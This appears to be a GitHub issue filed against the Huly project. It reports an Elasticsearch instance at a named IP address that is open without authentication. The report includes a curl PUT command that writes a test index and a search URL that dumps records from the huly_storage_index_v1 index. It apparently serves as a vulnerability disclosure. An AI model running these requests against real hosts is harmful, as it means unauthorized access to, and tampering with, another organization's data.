You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
A clear and concise description of the issue.
i found bug Elasticsearch instance unprotected, thus allowing an attacker to perform write/read operations on the database huly
Your environment
Version of Huly
Browser (and version)
Your operating system (and version)
Steps to reproduce
Please produce the steps for us to reproduce this issue.
1- i use for exploit bug and create poc in db by used in linux os
Description of the issue
A clear and concise description of the issue.
i found bug Elasticsearch instance unprotected, thus allowing an attacker to perform write/read operations on the database huly
Your environment
Steps to reproduce
Please produce the steps for us to reproduce this issue.
1- i use for exploit bug and create poc in db by used in linux os
curl -XPUT 'http://23.94.180.12:9200/poc3' and see create poc in db
http://23.94.180.12:9200/poc3
and go to http://23.94.180.12:9200/huly_storage_index_v1/_search?size=1000 and see huly in url thats means own company
Expected behaviour
Tell us what should happen.
Actual behaviour
Tell us what happens instead (include screenshots or logs).
thus allowing an attacker to perform write/read operations on the huly
Possible solutions
(Not obligatory)
If you know how to fix the bug, please describe your solution here.
The text was updated successfully, but these errors were encountered: